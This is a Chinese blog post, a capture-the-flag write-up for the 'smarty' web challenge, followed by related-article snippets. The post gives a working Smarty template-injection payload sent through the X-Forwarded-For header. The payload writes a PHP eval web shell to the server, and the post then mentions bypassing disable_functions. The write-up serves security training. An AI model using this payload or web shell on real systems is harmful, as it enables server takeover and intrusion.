攻防世界--smarty

最新推荐文章于 2024-08-24 16:03:02 发布
最新推荐文章于 2024-08-24 16:03:02 发布
阅读量1.1k 收藏 3
点赞数 1
文章标签: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46263951/article/details/122373805
版权

根据题目和页面内容 提示,可以知道这里使用的是PHP中的Smarty模板
网上看这个模板存在着模板注入,但是没有找到参数,猜测在请求头

那就有两种可能的注入点:

  • XFF
  • client IP

发现XFF存在注入
 

 测试phpinfo()发现这里禁用了很多函数,并且可访目录也做了限制

 使用{if}标签写入一句话木马

{if file_put_contents('/var/www/html/shell.php','<?php eval($_POST[cmd]);')}{/if}

连接蚁剑

进入之后发现无法访问其他目录,也没法执行命令 

看师傅们都是用的无需sendmail:巧用LD_PRELOAD突破disable_functions

本人菜逼,使用的是蚁剑中的插件

 
  

Uzero.
关注
攻防世界 web高手进阶区 9分题 smarty
闵行小鱼塘
10-17 3332
继续ctf的旅程,开始攻防世界web高手进阶区的9分题,本文是smarty的writeup
Daily-Smarty-UI:每日Smarty用户界面
04-22
"Daily-Smarty-UI:每日Smarty用户界面"是一个基于React、Redux和Router的前端开发项目,主要面向学习和实践JavaScript技术栈的学生。这个项目旨在帮助开发者熟悉和掌握现代Web应用开发的核心技术,构建一个交互式的...
攻防世界高手进阶区php2,攻防世界 web高手进阶区 9分题 smarty
weixin_30652105的博客
03-13 342
前言继续ctf的旅程开始攻防世界web高手进阶区的9分题本文是smarty的writeup解题过程smarty是php模板引擎这题应该是一个SSTI进入界面根据题目和页面最下方build with smarty确认是用smarty模板那就有两种可能的注入点:XFFclient IP尝试将XFF头改为{7*7}发现current IP的值变为了49可以确定这里存在SSTI尝试注入{$smarty.v...
攻防世界-web题型-8星难度汇总-个人wp
最新发布
DamnVanish的博客
08-24 1023
攻防世界web题型8星难度
Smarty_smarty_
10-04
Smarty 模板引擎教程,内容主要有基本语法、变量、组合修改器、内建函数、自定义函数、配置文件、控制台调试、缓存、插件扩展、使用技巧和经验等,比较详细的一个中文手册
xctf攻防世界smarthacker wp
sash1mi
02-19 493
xctf攻防世界smarthacker wp 考察知识点:源码泄露 python脚本 访问题目地址 下载www.tar.gz 我直呼好家伙,三千多个php文件,而且很乱,根本没法看,不过里面包含很多shell 不过很多shell都没用,猜测这几千个php文件中肯定含有可以使用的shell,只有写脚本去试了 掏出脚本: import requests import os import re import threading import time requests.adapters.DEFAULT_
攻防世界-command_execution
weixin_49539962的博客
08-21 107
题目告诉了,这可以执行ping命令且没WAF,那就可以在ping命令后连接其他命令。服务器一般使用Linux,在Linux中可使用“&”连接命令。
攻防世界--Web进阶--Web_python_template_injection---python模板注入---writeup
z2560088的博客
10-10 1022
- 首先看到题目,就知道这道题是关于 **模板注入** 的,什么是模板注入呢? - 为了写 html 代码的时候方便,很多网站都会使用模板,先写好一个 html 模板文件, 比如: ```python def test(): code = request.args.get('id') html = ''' <h3>%s</h3> '''%(code) return render_template_string(html) ``` 这段代码中的 `h..
前端开源库-smarty-loader
08-29
本文将深入探讨“前端开源库-smarty-loader”,一个专为Webpack设计的Smarty模板引擎加载器。 首先,让我们理解一下“Webpack”。Webpack 是一个模块打包器,它能够将JavaScript模块按照依赖关系进行静态分析,然后...
smarty-vscode-support:用于Visual Studio Code的Smarty模板支持扩展
05-01
用于Visual Studio代码的Smarty模板 此扩展为Visual Studio Code提供支持。 支持{...}和{{...}}分隔符。 特征 语法高亮 片段完成 代码格式 代码折叠 代码导航 评论切换 支架自动关闭 支架自动环绕 悬停文档 自动...
PHP—Smarty模板
12-01
Smarty是一个使用PHP写出来的模板引擎,是目前业界最著名的PHP模板引擎之一。它分离了逻辑代码和外在的内容,提供了一种易于管理和使用的方法,用来将原本与HTML代码混杂在一起PHP代码逻辑分离。简单的讲,目的就是要使PHP程序员同前端人员分离,使程序员改变程序的逻辑内容不会影响到前端人员的页面设计,前端人员重新修改页面不会影响到程序的程序逻辑,这在多人合作的项目中显的尤为重要。
CMS程序Smarty模板引擎 v2.6.26-smarty-2.6.26.zip
03-09
Smarty v2.6.26是该引擎的一个版本,提供了丰富的功能和优化,旨在提高开发效率和代码可维护性。 Smarty的核心理念是“智能模板”,它允许开发者使用简单的HTML语法来定义模板,同时嵌入PHP代码片段,通过预编译和...
smarty-3.1.29
12-24
Smarty-3.1.29这个版本中,可能包含了一些bug修复、性能优化和新功能的添加,但具体更新内容需要查看该版本的官方发布说明。使用这个版本,开发者可以获得更稳定、更高效的模板处理体验。为了确保最佳性能和兼容性...
攻防世界
jemo的博客
05-23 441
crypto新手区1.base642.Caesra3.Morse4.幂数加密5.Railfence6.不仅仅是morse7.混合编码8.easy_RSA9.easychallenge10.转轮机加密 1.base64 打开附件,用base64,得出flag 2.Caesra 打开附件 很明显是凯撒密码,但是由于不知道位移是多少(也有可能是我猜看不出来),一个一个式,当位移为12时得出flag 3.Morse 打开附件,只有0和1猜想为摩斯密码,把1改为-,把0改为. 用摩斯密码解密后,根据题目提示
攻防世界 blgdel
xiaoqi199915的博客
06-02 1032
攻防世界 blgdel 小白的刷题之路 从0到1 扫描一下目录 发现robots.php 进行访问 发现一个config.txt 打开发现的是源代码 观察代码发现好多正则匹配的原则 和一些过滤的规则 还是没有方向 返回主页面进行查看 发现一个注册和登陆的界面 先随便注册一个账户 点开了头像 发现是一个上传页面 ,猜测是一个上传 上传一个php一句话 提示我们权限不够 审查源代码 看见一个推荐人的信息 没有办法 连续注册了12次!!!!! 发现积分变成了120 此时在上传 发现可以上传 在次上传一个php
攻防世界-wp-CRYPTO-新手区-9-easychallenge
Scorpio_m7
08-20 1193
题目来源: NJUPT_CTF 题目描述: 你们走到了一个冷冷清清的谜题前面,小鱼看着题目给的信息束手无策,丈二和尚摸不着头脑 ,你嘿嘿一笑,拿出来了你随身带着的笔记本电脑,噼里啪啦的敲起来了键盘,清晰的函数逻辑和流程出现在 了电脑屏幕上,你敲敲键盘,更改了几处地方,运行以后答案变出现在了电脑屏幕上。 题目附件: 42aa1a89e3ae48c38e8b713051557020.pyc ](https://adworld.xctf.org.cn/media/task/attachments/42aa1a8
攻防世界 gametime
P_Bloomberg的博客
08-09 2238
准备 工具:IDA、x32dbg、010Editor 环境:Windows10 开始 附件是exe可执行文件,在cmd里执行后,发现是一个游戏 玩了一会后,发现规律大概是它出现什么字母,你就要根据下面的规则按下相应的键 's'-->' ' 'x'-->'x' 'm'-->'m' 一开始可能还可以,后来速度快就没法玩,所以动态调试 IDA静态分析 先拖进IDA中,分析main函数 int __cdecl main(int argc, const char **argv, con
攻防世界】bufoverflow_a
weixin_43960998的博客
04-09 277
1.程序逆向 简单的逆向,记一下几个地方:当chunk数大于2时,便使用 calloc 分配并且 free 后会进行填充: 关于 mallopt 见这里。 漏洞出现在 fill 功能中,存在 off by null。 show 输出遇 0 截断。 2.漏洞利用&限制条件 off by null chunk size 无限制 可以泄漏地址 chunk 只有两个 show 遇 ‘\x00’ 截断 可以无限次 edit     由于能够正常 malloc
攻防世界smarty
09-05
攻防世界是一个CTF(Capture The Flag)比赛平台,提供了一系列的题目供参赛者进行攻防演练。在攻防世界中,有一个名为"web高手进阶区"的区域,其中包含了一道使用Smarty模板的题目。Smarty是一种PHP的模板引擎,用于在PHP应用程序中实现视图和逻辑的分离。在这道题目中,参赛者需要利用Smarty模板注入的漏洞来获取敏感信息或执行恶意代码。注入点可以是XFFclient IP,也可以是其他可能存在的点。注入方法常见的有使用{}{php}{/php}标签,但这在较新版本的Smarty中已经被弃用。其他的注入方法可能会因为版本不同而有所差异。参赛者需要仔细分析题目给出的线索和页面源代码,找到注入点并选择合适的注入方法来完成挑战。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [攻防世界 web高手进阶区 9分题 smarty](https://blog.csdn.net/weixin_44604541/article/details/109123323)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值